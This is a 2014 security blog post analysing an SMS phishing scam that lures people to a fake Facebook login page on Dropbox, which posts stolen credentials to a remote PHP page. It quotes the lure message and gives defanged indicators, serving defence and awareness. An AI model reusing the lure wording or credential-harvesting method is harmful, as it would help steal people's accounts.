Update, 01 Sept 2014: NUMBERCOP, one of our blog readers, has tipped us off in the comments section about this particular scam resurfacing once again with a new bit.ly URL, which was created last August 31, 2014, a couple of days ago. The number of visitors to that link, as of this writing, seems to have been increasing.
Original post:
click to enlarge
If you happen to receive an SMS message from a potentially unknown recipient with the following text—
wtf f***** remove this pic from Facebook. http://bit[dot]do/fbnudephotos
—much like the fellow on the screenshot above, then you’ve been targeted by a phishing campaign.
The bit.do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
click to enlarge
All links but one–the Get Facebook for iPhone and browse faster. link–lead to a 404 page. The aforementioned link leads to the actual iTunes app download page.
The full code of the page is actually hex encoded and executed by the unescape () function. Partial code looks like this once decoded by an online, free tool:
click to enlarge
Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware.
While this happens at the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con.
click to enlarge
Another thing of note is the bit.ly URL at the bottom of the code:
This is a shortened URL for what we believe is a page that was once a diet scam page, judging from the actual URL string we have encountered before:
click to enlarge
We suspect that this bit.ly URL is included to increase the click-through rate or visits to the page.
Individuals or groups with bad intent have been using SMS as a way to scam people, either for their money or for their information.
Senior Security Researcher Jérôme Segura have published a post entitled “SMS Scams: How To Defend Yourself” back in 2013, which I recommend you, dear Reader, to read as well. His thoughts on this kind of fraud remains relevant to this date.
Other related post/s:
- Uncovering an Android botnet involved in SMS fraud
- Mobile Top-Up Credit Sharing Scams in Circulation
- SMS Activated Flash Downloads: A Digital Leap of Faith
- Porn on YouTube Leads to Premium-Rate SMS Scams
Jovi Umawing
